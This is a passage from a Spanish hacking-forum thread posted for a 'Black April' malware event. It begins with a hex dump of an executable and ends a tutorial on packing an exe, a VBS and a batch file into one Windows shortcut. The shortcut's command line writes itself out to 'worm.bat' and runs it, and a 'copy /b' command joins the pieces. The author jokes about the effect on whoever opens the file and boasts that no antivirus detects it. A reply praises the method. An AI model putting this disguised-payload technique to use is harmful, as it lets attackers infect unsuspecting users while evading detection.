0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007180B743000000000000030003000000580000800E000000400000801000000028000080000000007180B74300000000000001000100000070000080000000007180B74300000000000001000100000088000080000000007180B743000000000000010031750000A0000080000000007180B74300000000000001000A0C0000B8000000000000007180B743000000000000010000000000C8000000000000007180B743000000000000010000000000D8000000F040000028020000B0040000000000001843000014000000B0040000000000002C430000E8020000B0040000000000000000000000000000280234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE000001000000010000000000000001000000000000000000000000000400000001000000000000000000000000000000440000000000560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000A0CB00488010000010053007400720069006E006700460069006C00650049006E0066006F00000064010000010030004300300041003000340042003000000044002200010043006F006D00700061006E0079004E0061006D006500000000004100670065006E00630069006100200043007200610063006B0069006E00670000000000340014000100500072006F0064007500630074004E0061006D00650000000000500072006F0079006500630074006F00310000002C000A000100460069006C006500560065007200730069006F006E000000000031002E00300030000000000030000A000100500072006F006400750063007400560065007200730069006F006E00000031002E00300030000000000034001200010049006E007400650072006E0061006C004E0061006D00650000004B0065007900470065006E006D0065000000000044001A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004B0065007900470065006E006D0065002E00650078006500000000000000010001002040000001000400E802000031752800000020000000400000000100040000000000800200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FF9FFF999FF99FF9FF9F9F9FF9FF9FFF9F9FF9FF9F9FF9F9FF9F9F9FF9F9FFFF9F9FF9FF9F9FFFF9F9FF9F9FF9F9FFFFFF9FFF999F9FFFF99FFF9F9FF9F9FFFFFF99FFFF9F9FF9F9F9FF9F99F9F9FFFF9F9F9999FFF99FF9FF9F9F9F9FFF9FFF9FFFFFFFFFFFFFF9FFFFFFFFFFFFF999FFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFF999FFFFFFFFFFFFFFFFFFFFF9FFF9FF9FFFFFFFFFFFFFFFFFFFFFFFF9FFFF9F9999FFFFFFFFFFFFFFFFFFFFF9FFFF9F9FF9FFFFFFFFFFFFFFFFFFFFF9FFFF9FF99FFFFFFFFFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFF999F999F9999FF999FF999F999F9999FF9FFF9FF9FFFF9FFFF9FFFFF9F9FF9FFF99999FFF99FF9999F9FFFFF9FF999FFFF9F9FFF9FF9F9FF9F9FF9FF9FFFF9FFFF9F9FFFF9999F99FFF999F99FF99FFFFF9F9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFF9FFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  2.  


ahora nos ase falta el acceso directo el cuan anterior mente llamamos "6.lnk" y contendrá lo mismo en el campo destino

C:\Windows\System32\cmd.exe /c type w.lnk> worm.bat&worm.bat

ahora ya para terminar pasaremos a juntarlos con el simbolo del sistema y teclearemos esto


copy /b 6.lnk+comandos.bat+code.txt w.lnk


como resultado nos creara el archivo "w.lnk" el cual si ejecutamos %&$+#01(*%$  ya saben lo que pasa jajajajaja

Saludos Flamer y hay esta el tutorial que prometí ase muchos años Feliz Abril Negro

Nota: y si le pasan el virustotal verán que ninguno lo detecta hasta ahora




En línea

Mi Canal De Youtube y Blog

https://elblogdeflamer.blogspot.com

Borito30


Desconectado Desconectado

Mensajes: 481


Ver Perfil
Re: [Abril Negro] Unir Archivos Exe,Vbs y Bat a Un Acceso Directo lnk
« Respuesta #1 en: 17 Marzo 2018, 12:44 pm »

buena este metodo viejo pero eficiente viene bien recordarlo!


En línea

Estoy en contra del foro libre y la Sección de juegos y consolas (distraen al personal)
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Abril NEGRO!
Abril negro
Man-In-the-Middle 1 6,498 Último mensaje 24 Marzo 2006, 00:33 am
por Man-In-the-Middle
[Abril Negro] Archivos y CMD
Abril negro
Kizar 6 3,665 Último mensaje 2 Abril 2006, 14:04 pm
por Kizar
Wallpaper Abril 2010 (Abril Negro) « 1 2 ... 5 6 »
Diseño Gráfico
peib0l 55 48,128 Último mensaje 22 Marzo 2010, 23:26 pm
por Castg!
Problema con archivos de acceso directo
Programación C/C++
TheWarriorVicent 2 2,212 Último mensaje 14 Junio 2011, 20:41 pm
por TheWarriorVicent
manejo de archivos de acceso directo en C++
Programación C/C++
aryel_1203 1 2,897 Último mensaje 13 Diciembre 2016, 13:45 pm
por ivancea96
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines